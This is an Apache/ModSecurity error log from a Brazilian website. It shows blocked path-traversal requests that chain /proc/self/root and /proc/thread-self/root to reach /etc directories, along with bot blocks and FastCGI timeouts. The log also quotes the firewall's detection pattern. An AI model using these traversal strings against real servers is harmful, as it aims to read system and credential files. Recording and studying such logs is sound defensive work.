https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:01.644663 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:56044] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5Tda6ubjKNq_cu4YzaAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:09.979622 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:42130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5VdY0UrI5A3LftIwsWAAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:12.128811 2026] [proxy_fcgi:error] [pid 2598:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53198] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:01:13.603486 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:42136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5WdY0UrI5A3LftIwsWgAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:16.176455 2026] [:error] [pid 18211:tid 140411691570944] [client 74.7.241.31:42150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5XBcIZFNFgEhGGCREMwAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:17.425682 2026] [:error] [pid 18211:tid 140411683178240] [client 74.7.241.31:42150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5XRcIZFNFgEhGGCRENQAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:20.738028 2026] [:error] [pid 2598:tid 140411599251200] [client 74.7.241.31:40276] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5YBj0p0SRWAqcjGGnFAAAAxE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:34.126506 2026] [proxy_fcgi:error] [pid 25836:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53804] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:01:41.051328 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:57664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5dew_le52K8_3pV15vQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 22:01:45.575449 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.241.31:40284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn5ecdf6f5d65gmYZRsdQAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:01:56.072136 2026] [proxy_fcgi:error] [pid 18211:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:54198] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:02:19.137837 2026] [proxy_fcgi:error] [pid 18211:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54602] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:02:27.782201 2026] [mime_magic:error] [pid 17653:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:62650] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Tue Mar 17 22:02:41.133805 2026] [proxy_fcgi:error] [pid 17972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55018] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:03:03.137847 2026] [proxy_fcgi:error] [pid 17972:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55468] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:03:17.762872 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.243.128:39834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn51Yh-PF_25v4hFRCYdwAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:03:26.129884 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:55958] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:03:30.410942 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.244.43:60812] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn54ta6ubjKNq_cu4YzsQAAA1E"]
[Tue Mar 17 22:03:47.193830 2026] [proxy_fcgi:error] [pid 25836:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56402] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:04:10.133797 2026] [proxy_fcgi:error] [pid 25836:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:56882] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:04:11.880105 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.228.61:38586] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn6CwkwaGbbGflqUZCxJgAAAM8"]
[Tue Mar 17 22:04:32.137974 2026] [proxy_fcgi:error] [pid 18211:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:04:54.129815 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57808] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:05:15.133788 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:58256] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:05:38.085789 2026] [proxy_fcgi:error] [pid 18211:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58734] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:06:01.166159 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59296] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:06:24.161791 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:59878] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:06:46.165900 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:60456] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:07:08.102589 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:32770] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:07:11.275006 2026] [:error] [pid 18211:tid 140411624429312] [client 74.7.243.128:48102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn6vxcIZFNFgEhGGCRFIwAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:07:22.213806 2026] [core:alert] [pid 17972:tid 140411691570944] [client 216.73.216.191:30062] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Tue Mar 17 22:07:31.060281 2026] [proxy_fcgi:error] [pid 17972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33228] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:07:55.157862 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33860] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:08:09.615061 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:53520] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn6-QkwaGbbGflqUZCxvgAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 22:08:17.145779 2026] [proxy_fcgi:error] [pid 25836:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34468] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:08:31.454290 2026] [:error] [pid 17972:tid 140411582465792] [client 74.7.244.43:58828] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn7D4Z5-GlpYjVrXCrjWwAAAlM"]
[Tue Mar 17 22:08:38.141832 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35000] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:08:46.165867 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:33654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn7HdY0UrI5A3LftIwtNwAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:09:00.162728 2026] [proxy_fcgi:error] [pid 11816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35564] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:09:12.912955 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.228.61:46780] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn7ONY0UrI5A3LftIwtPgAAAZg"]
[Tue Mar 17 22:09:24.131334 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36152] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:09:47.125940 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36846] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:09:56.432591 2026] [mime_magic:error] [pid 17972:tid 140411599251200] (70014)End of file found: [client 74.7.241.31:52252] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run
[Tue Mar 17 22:09:56.432825 2026] [access_compat:error] [pid 17972:tid 140411599251200] [client 74.7.241.31:52252] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run
[Tue Mar 17 22:10:10.820589 2026] [proxy_fcgi:error] [pid 25836:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37386] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:10:33.151141 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37998] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:10:55.997875 2026] [proxy_fcgi:error] [pid 25836:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38526] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:11:17.085925 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38982] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:11:40.169443 2026] [proxy_fcgi:error] [pid 18211:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39626] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:12:02.141877 2026] [proxy_fcgi:error] [pid 17972:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40192] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:12:08.726763 2026] [:error] [pid 18211:tid 140411649607424] [client 74.7.243.128:53932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn76BcIZFNFgEhGGCRFvwAAA8s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 22:12:25.681797 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:12:48.135697 2026] [proxy_fcgi:error] [pid 17887:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:41320] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:12:59.596038 2026] [:error] [pid 18211:tid 140411582465792] [client 74.7.243.128:53932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abn8GxcIZFNFgEhGGCRF4gAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 22:13:10.121870 2026] [proxy_fcgi:error] [pid 25836:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:41850] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:13:32.145792 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:42420] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:13:33.238343 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.244.43:49338] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abn8PeyqAr6etmhZHNpVnAAAAFg"]
[Tue Mar 17 22:13:54.877813 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42916] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 22:14:17.125780 2026] [proxy_fcgi:error] [pid 2598:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43474] AH01075: Error dispatching request to : (polling)
